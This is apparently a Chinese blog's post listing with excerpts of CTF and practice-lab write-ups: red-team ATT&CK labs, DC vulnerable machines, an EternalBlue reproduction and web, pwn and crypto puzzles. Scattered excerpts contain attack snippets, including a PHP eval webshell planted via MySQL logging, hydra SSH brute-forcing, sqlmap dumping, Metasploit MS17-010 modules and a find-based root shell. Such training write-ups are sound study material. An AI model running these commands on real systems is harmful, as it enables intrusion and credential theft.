- 博客(84)
- 收藏
- 关注
原创 ATT&CK 05
(psexec:微软官方实用工具(如 Telnet)和远程控制程序(如 Symantec 的 PC Anywhere)使您可以在远程系统上执行程序,但安装它们非常困难,并且需要您在想要访问的远程系统上安装客户端软件。PsExec 是一个轻型的 telnet 替代工具,它使您无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台应用程序相当的完全交互性。使用命令执行木马 (shell net use\\192.168.138.138\̲i̲p̲c̲ “!所要用到的攻击机为kali。
2023-01-15 17:59:25 373 1
原创 bugku-pwn-瑞士军刀 overflow2
在klai中使用file命令查看文件类型 可以看到是64位。system函数的地址是0×40043F。使用IDA 64 Pro打开文件 查看主函数。利用Kali连接 ls查看。给了个nc和文件 下载。
2023-01-13 19:39:06 1530
原创 bugku-reverse-入门逆向 Easy_vb re 游戏过关 逆向入门
flag生成逻辑为:将v2 ~ v58各字符分别与v59 ~ v115进行异或 再与0x13u(十进制19)进行异或 所得的v2~58字符即为flag。打开 发现要把8个都点亮 每次输入会把输入的数本身和他上一个下一个都改变状态,当所有都变亮,则出现flag。双击查看字符串内存地址 变量位于只读数据区(rdata)比如输入1后 和输入2后的对比 大于8就会报错。下载文件 解压后 拖入IDA中。同样方法 解压后 拖入IDA。选中这两行字符 转译。ALT+T查找flag。
2023-01-13 15:17:32 4333
原创 ATT&CK 01
因为链接的 Beacons 使用 Windows 命名管道进行通信,此流量封装在 SMB 协议中,所以 SMB)指定日志文件 (set global general_log_file = "C:/phpStudy/www/1.php")使用蚁剑连接 (yxcms/protected/apps/default/view/default/2.php)php eval($_POST["cmd"]);扫描出VM2域中的win8主机 (win2k3主机没开 因为开后VMware实在太卡了 最后再开启 )
2023-01-03 11:36:19 516
原创 ctfhub-web-warmup
mb_strpos()函数返回在$page中?前的内容,没有则返回$page的值。解码截取后$page在$whitelist数组中,返回true。截取后$page在$whitelist数组中,返回true。$page在$whitelist数组中,返回true。$page不为空或不为字符串,返回false。果然后面的代码不会白瞎 安心分析源码咯。查看源代码 提示source.php。对$page进行URL解码。中,因为不知道在哪个目录,多次添加。打开题目链接 是一张图。进入hint.php看看。
2022-11-20 09:52:50 479
原创 ctfhub -afr -1 2 3
补充(Linux系统上的/proc目录是一种文件系统 即proc文件系统 与其它常见的文件系统不同的是 /proc是一种伪文件系统(也即虚拟文件系统) 存储的是当前内核运行状态的一系列特殊文件 用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息 甚至可以通过更改其中某些文件来改变内核的运行状态。发现flag在flag.py flask的appkey在key.py 但是此处任意文件读取漏洞被过滤了关键词flag。p=flag 回显了 no no no。默认的传参数据为?
2022-11-18 21:31:45 1222
原创 bugku-web-社工-初步收集
得到了类似用户名和口令的base64加密代码 拿去解密。尝试登录 同时 打开wireshark进行流量截取。下载得到一个压缩包 解压打开 是一个小插件。再起始页面 存在一下下载点 可以操作。打开 wireshark 选择WLAN内容。smtp过滤 查看它的电子邮件流量数据。小时候特感兴趣的网站 目录扫描一下。社工又有杂项的存在 打开题目。搜寻邮件 拿到真实用户名和密码。得到一个管理员后台登录网站。进入 拿到flag。
2022-11-16 22:05:48 939
原创 bugku-web-安慰奖
唯一可以传的是code的值 所以用code里面包含username和cmd即可传值给他们因为类名是ctf 所以构造为。exit('flag能让你这么容易拿到吗?get获取code的值传给select并把select的值反序列化后传给res。如果username的值为admin将cmd的值传给a变量并输出执行。打开 进行代码审计 是php序列化 反序列化的内容。存在一个flag.php文件 但是访问没有结果。此处是将username的值改为guest。点开链接 是空白页面。
2022-11-15 16:17:36 872
原创 ctfhub find_it
变量a有过滤 有个逻辑漏洞flag.php的内容 如果被绕过的话就会写入到hack.php中 我们可以直接。这里有个很大的坑 就是1ndexx.php也是个隐藏文件 应该在前面的访问目录下加个点 进行访问。执行命令后 访问hack.php 得到flag。根据题目find_it 说明应该是源代码泄露。使用工具 dirseach 目录扫描一下。得到一个可用文件 访问试试看。告诉我们它的php文件不见了。找到了不见的php文件。网站文件泄露常用后缀。网站文件泄露常用名称。
2022-11-15 11:29:50 987
原创 ctfhub hate_php
闭合前面的php 同时执行我们后面构造想要执行的内容。首先进行了一个正则匹配 过滤掉了A~Z的26个字母大写 a ~ z的26个字母小写 0 ~9这十个数字。preg_match函数。我们需要构造语句绕过。
2022-11-15 10:38:38 396
原创 DC-9靶机
想要利用ssh服务 但是需要用户名和口令 同样按照上述步骤获取users数据库的信息 (sqlmap -u 'http://192.168.115.139/results.php' --data "search=1" -D users -T UserDetails -C username,password,id --dump --batch)简单来说就是:知道它的自定义端口后 依次对其进行敲门 然后就可以开启ssh服务从而进行连接了 它的默认配置文件为:/etc/knockd.conf。
2022-11-14 11:46:57 1089 1
原创 bugku-web-文件上传
不可以上传 php文件 说明一共存在三个过滤 请求头部的 Content-Type 文件后缀 请求数据的Content-Type
2022-11-02 15:57:17 2075
原创 bugku-web-source
下载下来 (wget -r http://....../.git)得到三个结果 一个一个测试 确定.git是目标。进入文件 114.....:18712文件夹。git show挨个测试 那个才是真正的。显示可引用的历史flag记录 (命令:可以叫做显示可引用的历史版本记录)使用linux环境 kali尝试一下。题目告诉我们要在linux环境下解题。查看源代码 送人头?git reflog命令。下载完成 先查看下。
2022-11-01 17:07:32 1304
原创 bugku-web-XXX二手车交易市场
上传成功 然后修改请求体中的内容 仔细观察 它的数据是使用base64加密过的 所以我们上传的木马也要使用base64加密。原本我们上传的为png后缀图片 然后服务器返回的缺失jpeg后缀 请求包中又为jpeg 值。说明可能这里是控制后缀的 那我们修改请求的数据包 jpeg-->php。在这里存在一个上传点 用户的头像 交互时的漏洞。然后我们进行正常的上传 burpsuite抓包。题目没给我们太多可提取的信息 打开链接。上传后检测下是否上传成功。观察抓到数据包的信息。
2022-11-01 16:35:30 914
原创 DC-4靶机
进行爆破(hydra -L dc-4user.txt -P dc-4passwd.txt 192.168.115.135 ssh -s 22)回显一个类似口令的文件 打开看看 (cat+/home/jim/backups/old-password.bak)在这里发现3个用户名 切换到charles目录 看看有什么信息(ls+-al+/home/charles)木有什么有用的信息 切换到jim目录再看一下 (ls+-al+/home/jim)start attack开始攻击。
2022-10-22 08:44:54 272
原创 永恒之蓝复现
1 auxiliary/scanner/smb/smb_ms17_010 (永恒之蓝扫描模块) 2 exploit/windows/smb/ms17_010_eternalblue (永恒之蓝攻击模块)其次 利用攻击模块 对靶机进行攻击 (use exploit/windows/smb/ms17_010_eternalblue)先利用ms17-010扫描模块 (use auxiliary/scanner/smb/smb_ms17_010)对靶机进行扫描。接下来可以添加用户 赋予权限。
2022-10-09 18:46:04 586
原创 DC-3靶机
保存就上传 然后进行测试访问 (再根据joomla的特性 模块会单独放在一个文件夹里/templates/ 而beez3模块就在/templates/beez3/里面 刚才创建的webshell路径为)http://192.168.47.150/templates/beez3/shell.php。文本写的是漏洞产生的原因 描述和漏洞利用的方法 还附上了exp 最后一行的连接 (执行下两个文件 Linux系统下.(点)是执行某个文件的意思 (./compile.sh)
2022-10-01 20:58:20 1907
原创 DC-2 靶机
ps:上面url有时候不会跳到http://dc-2/wp-admin/ 导致登录后空白 可以登录后输入url 就可以进去了。爆破 (wpscan --url http://dc-2/ -U user.txt -P passwd.txt)先用字典来试一下 ( cewl http://dc-2 -w passwd.txt)将爬取http://dc-2/网站生成的字典 放在桌面上的passwd.txt文件中。/bin/bash #末尾)来挖目录 (dirb http://dc-2)
2022-09-27 19:39:06 344
原创 DC-1靶机
在scripts录有password-hash.sh文件 是可以用该文件生成自己的密码hash值替换数据库hash达到登陆后台的目的 这里换成admin。百度上找到drupal的配置文件是 /var/www/sites/default/settings.php。使用find命令提权 (find ./ aaa -exec '/bin/sh' \;打开看看 再给我们下一关的提示 (每一个好的CMS都需要一个配置文件--你也是)的命令 (find / -perm -4000 )
2022-09-22 22:14:31 406
原创 ping ping ping
找到了线索 看到了存在flag的文件 紧接着进行读取。选择一中方式进行传参 点击查看源代码 得到flag。那我们先来测试下它的版本 ip换成IP试试看。它又告诉我们不过滤空格 |ls 再试一次。像是再给我们提示一样 先ping一下。原理来解题 后面加上 | ls。由此 可以看出为Linux。那我们用命令执行的绕过方式来解决。它又在过滤关键字 flag。
2022-09-06 09:25:00 878
原创 CTFHUB web-hate_php
打开题目 一篇代码先进行代码审计看到PHP正则表达式 preg_match 显然在传参时 它会进行过滤 过滤后面括号中的关键字和特殊符号第二个正则表达式也会过滤PHP的内置函数 即使我们找到了某个函数恰好可以绕过第一个 但也过不去第二个过滤函数 get_defined_functions 所以这里我们利用异或或者取反来绕过一般flag文件都会存放在根目录下 但是这里我们知道在哪 所以尝试一下使用print_r函数 进行目录扫描利用在线
2022-09-05 10:56:59 1560
原创 CTFHUB
②private属性序列化的时候会引入两个\x00 注意这两个\x00就是ascii码为0的字符 这个字符显示和输出可能看不到 甚至导致截断 但是url编码后就可以看得很清楚了 同理 protected属性会引入\x00*\x00 此时 为了更加方便进行反序列化Payload的传输与显示 我们可以在序列化内容中用大写S表示字符串 此时这个字符串就支持将后面的字符串用16进制表示。1.先分析is_valid函数 代码通过控制read()读取flag.php的内容。经典的PHP反序列化。..
2022-08-09 16:53:43 1191
原创 命令执行漏洞
修改一些参数 因为原码中使用的是eval 那我们就不能再用eval了 换成ehco输出。key_14740110786978.php 再用tac命令拿到key。一串PHP代码 加密后的 那么我们直接在线运行试试看。打开后先看背景介绍 网址上存在一加密代码 THEN。要是知道 $_REQUEST功能非常强大 这里的作用。&去掉 因为我们不再加密 而是执行。得到解密后的内容 用a来传参。题目(mozhe.cn)属于白盒,代码设计 部分。小结: 漏洞形成条件。...
2022-08-03 11:18:36 233 1
原创 web newphp
打开题目 点开链接一个php文本 本题应该属于是php审计的内容仔细看文本 PHP反序列化字符串逃逸的条件:先进行序列化,再进行字符串替换。有两个反序列化字符串 write readread的应用(read没有参数但是传入了一个参数 这在php中是不会报错 注意read中将’\0\0\0’六个字符替换为了三个字符 这就给反序列化字符串逃逸提供了机会)PHP反序列化字符串逃逸的条件:先进行序列化 再进行字符串替换有两个反序列化字符串 write read然后我们构...
2022-05-26 16:45:03 362
原创 crypto 来自宇宙的信号
感觉作完有种可以变身的感觉 嘻嘻嘻题目原型又是加密的密文 这次应该和宇宙有关没错 就是 银河字母加密仔细对照一下fnopqrst 列出对应的字母 得到flag有点草率的感觉
2022-05-24 23:33:05 163
原创 crypto 这是个盲兔子 jr在唱歌
先看题目只有标题有可用的信息 盲兔子 唱歌下载文件 解压只有一个有意思艾 新鲜好似盲文 标题也在告诉我们 盲兔子 拿去 盲文解密 Here we go!盲文解密解出来还是密码的格式 别急 盲兔子 那么再进行兔子解密Rabbit加密/解密也得到了结果 but还是密文 wait 仔细看是不是音符再进行音乐符号解密文本加密为音乐符号得到flag...
2022-05-19 19:35:19 153
原创 WEB 文件上传
先看题目简单的描述 文件上传常规思路 上传一个木马文件 再去链接 ......先上传一普通文件试试看You was catched 看一下前端源码 没有太大线索抓包吧 上burpsuit...
2022-05-19 16:30:24 327
原创 crypto 一段新闻
打开题目 没有太多提示下载解压后 里面只有一个文件正常txt结尾打开查看 一脸懵这该如何下手 担心自己有没有看到不该看的 瞟了眼才知道 是 隐藏字符加密拿去解密look 得到了熟悉的社会主义核心价值观密文 再次进行解码得到flag...
2022-05-16 23:09:34 184
原创 WEB 需要管理员
做题之前先看一下有没有可用的提示似乎隐藏了 点开链接404页面 欧 不太友好 自此 我们先思考一下 题目标题为 需要管理员 点开链接或许是因为我们没有权限 出现了404 那 思路来了 这题的目的是不是想要我们拿到根目录里存在登录的权限 拿到username passwd 就是flag 或是再登录拿到flag用御剑扫一下刚开始 它就第一个跑出来 点开里面存在一个php 的文件 顿时来了兴趣 访问 方向没错别高兴太早 还没结束By bugkuctfif (...
2022-05-12 15:22:44 386
原创 MISC 宽带信息泄露
打开题目猜测应该为一个 网络 or 安全设备的配置文件 又或者是流量文件 首先想到了wireshark下载后是一个压缩文件 解压二进制bin的后缀正常打开 果不其然 乱码这里我们不要使用wireshark 利用 Routerpassview(RouterPassView,大多数现代路由器允许您备份到一个文件路由器的配置,然后从文件中恢复配置时的需要。路由器的备份文件通常包含了像您的ISP的用户名重要数据/密码,路由器的登录密码,无线网络的关键。如果你失去了这些密码...
2022-05-11 11:21:15 239
原创 crypto EN气泡
下载文件 打开第一次见 看讨论 才知道 这题的知识点是 Bubble密码加密/解密Bubble Babble Binary Data Encoding是由Antti Huima创建的一种编码方法,可以把二进制信息表示为由交替的元音和辅音组成的伪词(pseudo-words),主要用于密码指纹,其编码也具有内置的纠错和冗余。编码格式每5个字符中间以-来分隔,作者的原意就是想把难以记得的二进制数据表示为难忘的伪词拿去在线解密不行再试一次 越来越短了一直连续三次解码..
2022-05-10 23:23:33 457
原创 WEB 备份是个好习惯
先look题目似乎不太愿意透露太多 猜测 《备份》 题目的flag应该是藏在了根目录的某个文件里 又或者解题思路 扫描or注入 御剑前几天给搞丢了 所以今天 我们来挑战注入题目链接后的原始信息因为没有扫描 所以看不到后台是怎么搭建的 瞟两眼讨论 说文件index.php后缀为bak下载下来 使用sublim打开解析一下呗 那就 虽然自己的PHP 也属于是磕磕绊绊 但也不妨这里它说将get的两个参数中的key替换为空(这里可以用ke...
2022-05-09 22:49:11 368
原创 crypto 你喜欢下棋吗
先看题目要求下载文件 开始解题 是一个压缩文件 解压后有两个文件打开下面一个 看评论是 波利比奥斯棋盘密码 嘻嘻用密文来对照解码 44 23 24 43 24 43 35 34 31 54 12 24 45 43对应的密文为 THISISPOLYBIUS不能直接拿去用 转小写 thisispolybius 解压第一个文件得到了 真面目 为博多密码 在线解码 得到密文 bugku{BAUD0TC0DE} 记得开局提示我们要小写吗...
2022-05-08 23:35:07 214
原创 crypto 你以为是md5吗
下载 打开文件一串密文 题目就在告诉我们 MD5? 应该是不对的 但是我们还是要尝试一下LOOK 无法正常解密 细数一下 题目给我们的密文时35位的 而md5的规格MD5算法对输入任意长度的消息进行运行,产生一个128位的消息摘要(32位的数字字母混合码)所以 无论是二进制 还是十六进制 都不应该出现 i o u 删了后刚好 32位再次解码 得到结果 这是我们的 flag? 没错 是的 flag{666666666666}...
2022-05-08 22:42:27 807
原创 WEB 程序员本地网站
先看题目描述本地访问? 打开链接也是在告诉我们这个信息首先想到了使用BP 抓包 因为我们可以利用其来改包 伪装成本地访问原始报文的请求 我们来改动一下 点击Headers 新Add一条 X-Forwarded-For : 127.0.0.1请求报文发生变化添加一条X-Forwarded-For : 127.0.0.1将请求伪装成本地访问 改动后放出得到flag小结: 伪造请求头~X-Forwarded-For:简称XF...
2022-05-05 16:44:16 329
原创 web 好像需要密码
打开题目就告诉我们 需要密码才可以作点开链接很明显 密码爆破 首先想到了burpsuit 但是看讨论 burpsuit有些慢瓢到了大佬的代码 小跑一下得到密码 12468还可以用requests库requests库...
2022-05-05 14:36:06 221
原创 crypto 小山丘的秘密
下载 解压文件 得到两个文件夹打开flag命名的文件 直接给出了? 别想了 在提示我们什么线索 先收集再打开第二个观察一下一个棋盘? 应该是在给我们提供密文 或者密钥 搜索后得知 为 希尔密码 (慢慢理解) 懂得它的规则后 开始解题 一般的希尔密码是A=0 B=1 C=2 但是开局文件就告诉我们 A=1 so这里我们要更改一下解码时字母表的顺序 Z=0 A=1 B=2 将z提前 那么就差密钥了 第二个文件仔细观察...
2022-05-03 23:39:08 163
原创 misc easy_nbt
下载文件 得到文件 NEW WORLD文件夹打开后发现 一张图片文件判断这个文件夹应该是游戏我的世界的根目录 找到level.dat 文件 更改为zip后缀 解压再次打开 里面存在一个 level文件 使用记事本打开它看到里面存放的datactrl+f 查找 flag...
2022-05-03 22:41:20 1564
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人